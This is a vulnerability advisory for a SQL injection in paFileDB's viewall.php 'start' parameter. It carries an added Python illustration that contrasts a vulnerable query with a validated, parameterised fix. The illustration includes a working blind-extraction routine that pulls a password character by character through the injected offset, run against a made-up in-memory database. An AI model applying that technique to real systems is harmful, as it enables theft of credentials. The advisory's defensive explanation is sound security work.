paFileDB viewall.php start Parameter SQL Injection

2005-03-12T03:34:52
ID OSVDB:14839
Type osvdb
Reporter SecurityReason(sp3x@securityreason.com)
Modified 2005-03-12T03:34:52

Description

Vulnerability Description

paFileDB contains a flaw that allows a remote attacker to inject arbitrary SQL. The 'start' parameter of the 'viewall.php' script is used in a database query without being properly sanitized, so a crafted request can alter or extend the query the script executes against the backend database.
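The following is an added illustration, not paFileDB's own code: it models the class of bug described above (a request parameter spliced into SQL text) beside a hardened version that validates the value and binds it as a parameter. Everything beyond the advisory's statement is an assumption: that 'start' is a pagination offset used in a LIMIT/OFFSET clause, the table and column names, and the use of SQLite as a stand-in for the MySQL backend paFileDB targets. The blind-extraction helper shows why an unvalidated numeric offset matters even without quotes or a UNION: the attacker only needs to observe whether the page lists any files.

```python
"""Added example: an unsanitized 'start' offset, vulnerable vs hardened.

Assumptions (none taken from the advisory): the parameter feeds a LIMIT/OFFSET
clause, the schema below is made up, and SQLite stands in for MySQL.
"""
import re
import sqlite3
import string

PER_PAGE = 3

# Constructed sample data, not from any real installation.
SAMPLE_FILES = [(i, f"file{i}.zip") for i in range(1, 11)]
SAMPLE_USERS = [("admin", "s3cret")]


def make_db():
    """Build an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE files (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO files VALUES (?, ?)", SAMPLE_FILES)
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def viewall_vulnerable(conn, start):
    """The flawed pattern: the raw request value becomes part of the SQL text."""
    sql = f"SELECT id, name FROM files ORDER BY id LIMIT {PER_PAGE} OFFSET {start}"
    return conn.execute(sql).fetchall()


def parse_start(raw):
    """Whitelist the offset: a short run of ASCII digits, nothing else."""
    if not isinstance(raw, str) or not re.fullmatch(r"[0-9]{1,9}", raw):
        raise ValueError(f"invalid start parameter: {raw!r}")
    return int(raw)


def viewall_fixed(conn, raw_start):
    """Hardened pattern: validate first, then bind the value as a parameter."""
    start = parse_start(raw_start)
    sql = "SELECT id, name FROM files ORDER BY id LIMIT ? OFFSET ?"
    return conn.execute(sql, (PER_PAGE, start)).fetchall()


def blind_extract_password(conn, username, length):
    """Recover a password one character at a time through the vulnerable offset.

    The injected expression evaluates to 0 (first page of files comes back) when
    the guessed character is right and to a huge offset (empty page) when it is
    wrong, so a yes/no observation per request leaks one character per hit.
    """
    recovered = ""
    for pos in range(1, length + 1):
        for ch in string.ascii_lowercase + string.digits:
            payload = (
                f"(SELECT CASE WHEN substr(password,{pos},1)='{ch}' "
                f"THEN 0 ELSE 100000 END FROM users WHERE username='{username}')"
            )
            if viewall_vulnerable(conn, payload):
                recovered += ch
                break
        else:
            break  # no candidate matched; stop rather than loop forever
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, start=0:", viewall_vulnerable(db, "0"))
    print("blind extraction:", blind_extract_password(db, "admin", 6))
    print("fixed, start=3:", viewall_fixed(db, "3"))
    try:
        viewall_fixed(db, "0 OR 1")
    except ValueError as exc:
        print("fixed rejects payload:", exc)
```

The fix has two independent parts: the whitelist regex makes the value an integer before it is used anywhere, and the bound parameter means the database driver never sees it as SQL. Either alone closes this bug; doing both is cheap and protects against the value later being reused in a second, hand-built query.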

Solution Description

No upgrade or workaround is currently known to correct this issue. However, PHP Arena has released a patch to address this vulnerability; apply it to affected installations.

Short Description

paFileDB 'viewall.php' does not sanitize the 'start' parameter, allowing a remote attacker to inject or manipulate SQL queries.

References:

Vendor URL: http://www.phparena.net/pafiledb.php
Security Tracker: 1013426
Related OSVDB ID: 14842
Related OSVDB ID: 14840
Related OSVDB ID: 14841
Nessus Plugin ID: 17327
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-03/0198.html
ISS X-Force ID: 19688
CVE ID: CVE-2005-0781
Bugtraq ID: 12788